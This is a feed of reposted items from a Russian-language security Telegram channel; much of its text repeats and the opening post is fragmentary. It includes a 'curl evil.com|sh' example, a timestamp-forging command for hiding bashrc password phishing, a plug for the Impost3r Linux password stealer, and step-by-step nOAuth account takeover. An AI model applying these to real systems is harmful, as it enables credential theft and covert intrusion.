Полезная штука для #privesc
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать
Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать
curl evil.com|sh, или через эксплойт), можно с её помощью попытаться зафишить пароль. Вообще, bashrc и подобные файлы редко регулярно проверяются, а таймштамп можно подменить через touch -a -m -t <timestamp> <file>Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать
sudo, и не параноить по поводу bashrc?😢1
Forwarded from Cybred
https://github.com/ph4ntonn/Impost3r/
Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.
When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.
When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
GitHub
GitHub - ph4ntonn/Impost3r: 👻Impost3r -- A linux password thief
👻Impost3r -- A linux password thief. Contribute to ph4ntonn/Impost3r development by creating an account on GitHub.
Forwarded from Нетипичный Безопасник (Мефодий Келевра) (MiF)
Находка дня https://weakpass.com/
Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘
Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘
Forwarded from $NATCH | Global Digital Bank
Итак, мы готовы объявить победителей нашего конкурса по взлому онлайн банка!
🎊Напомним призовой фонд:🎊
1️⃣место - 25 000₽ + мерч
2️⃣место - 15 000₽ + мерч
3️⃣место - 10 000₽ + мерч
🏆Наши победители конкурса по взлому онлайн банка🏆
🥇место - lewaperbb
🥈место - MagnumMalum
🥉место - darling_x0r
🎁Мы свяжемся с победителями в репортах на нашей площадке, и конечно ждем вас в 17.30 на нашем стенде для награждения мерчем!🎁
🎈Поздравляем победителей и благодарим всех участников!🎈
🎊Напомним призовой фонд:🎊
1️⃣место - 25 000₽ + мерч
2️⃣место - 15 000₽ + мерч
3️⃣место - 10 000₽ + мерч
🏆Наши победители конкурса по взлому онлайн банка🏆
🥇место - lewaperbb
🥈место - MagnumMalum
🥉место - darling_x0r
🎁Мы свяжемся с победителями в репортах на нашей площадке, и конечно ждем вас в 17.30 на нашем стенде для награждения мерчем!🎁
🎈Поздравляем победителей и благодарим всех участников!🎈
🔥8👏1
Forwarded from Anton Kutepov
Open Security Week — онлайн-спринт для экспертов ИБ
Приглашаю присоединиться к первому онлайн-спринту от сообщества Security Experts Community, который пройдет с 1 по 14 июня. В этот раз будем писать правила корреляции на языке XP.
Как вы знаете, в SOLDR есть модуль коррелятора, поэтому созданная экспертиза будет актуальна для пользователей нашего проекта.
Созданные правила будут опубликованы в открытом репозитории и будут доступны всем желающим.
Чтобы стать участником:
👉🏻 оставь заявку
🖊 подпишись на телеграм-канал
📅 дождись публикации задания 1 июня
Мы будем не соревноваться, а сообща решать актуальные задачи кибербезопасности. Все участники получат памятные подарки и приглашение на ламповый митап, где можно будет познакомиться и пообщаться лично.🍻
Приглашаю присоединиться к первому онлайн-спринту от сообщества Security Experts Community, который пройдет с 1 по 14 июня. В этот раз будем писать правила корреляции на языке XP.
Как вы знаете, в SOLDR есть модуль коррелятора, поэтому созданная экспертиза будет актуальна для пользователей нашего проекта.
Созданные правила будут опубликованы в открытом репозитории и будут доступны всем желающим.
Чтобы стать участником:
👉🏻 оставь заявку
🖊 подпишись на телеграм-канал
📅 дождись публикации задания 1 июня
Мы будем не соревноваться, а сообща решать актуальные задачи кибербезопасности. Все участники получат памятные подарки и приглашение на ламповый митап, где можно будет познакомиться и пообщаться лично.🍻
❤1👍1
Forwarded from SHADOW:Group
На сайтах, где идентификация идет по Email и есть возможность войти через Microsoft OAuth есть риск захвата аккаунта.
Дело в том, что Azure не проверяет установленную в аккаунте почту, что позволяет вам указать почту жертвы и войти на уязвимый сайт через OAUTH от ее имени.
- Жертва регается на сайте через свою почту.
- Заходим в Azure AD и меняем свою почту на почту жертвы.
- Заходим на сайт через Microsoft OAuth и получаем доступ к аккаунту жертвы.
Видео PoC
#web #ato #oauth
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications
nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications. This demo video explains how the misconfiguration can lead to full account takeover and how to prevent it.
This blog on nOAuth has more details:…
This blog on nOAuth has more details:…
🔥5
Forwarded from Cybred
Теория
— What is GraphQL?
— Finding GraphQL endpoints
— Exploiting unsanitized arguments
— Discovering schema information
— Bypassing GraphQL introspection defences
— Bypassing rate limiting using aliases
— GraphQL CSRF
Практика
— Accessing private GraphQL posts
— Accidental exposure of private GraphQL fields
— Finding a hidden GraphQL endpoint
— Bypassing GraphQL brute force protections
— Performing CSRF exploits over GraphQL
На Portswigger добавили новые лабы с GraphQL. Для сдачи экзамена пока не обязательны.
— What is GraphQL?
— Finding GraphQL endpoints
— Exploiting unsanitized arguments
— Discovering schema information
— Bypassing GraphQL introspection defences
— Bypassing rate limiting using aliases
— GraphQL CSRF
Практика
— Accessing private GraphQL posts
— Accidental exposure of private GraphQL fields
— Finding a hidden GraphQL endpoint
— Bypassing GraphQL brute force protections
— Performing CSRF exploits over GraphQL
На Portswigger добавили новые лабы с GraphQL. Для сдачи экзамена пока не обязательны.
portswigger.net
What is GraphQL? | Web Security Academy
GraphQL is an API query language that is designed to facilitate efficient communication between clients and servers. It enables the user to specify exactly ...
👍3
Кто ещё не видел, отличный ресурс - очень много статей (papers) по ВПО (malware), и не только
https://www.vx-underground.org/
https://www.vx-underground.org/
👍3🔥3
Forwarded from Artur Lukianov
Ещё небольшая заметка по поводу GPT и подобных моделей - есть опенсорсные Llama, для который много готовых весов, например vicuna-14b. Хотя требуют довольно много памяти для запуска, неплохо справляются с некоторыми ИБшными задачами - извлекать пароли из текста, искать почты на сайтах и придумывать домены для typesquotting
👍2
Forwarded from CyberOK_news
Рассказали в новой статье, как делали собственную блокчейн-сеть на Standoff 10 и проводили CTF для смартконтрактов
Читать тут 🦾
Читать тут 🦾
vc.ru
Создание Blockchain CTF: Исследование уязвимостей смарт-контрактов — Часть 1 — CyberOK на vc.ru
Мы в СайберОК в ходе пентестов очень любим “взламывать” разнообразные инновационные и необычные вещи. Смарт-контракты на блокчейне давно появились на наших радарах, так как они не только предлагают прозрачность, надежность и автоматизацию, но и легко могут…
👍3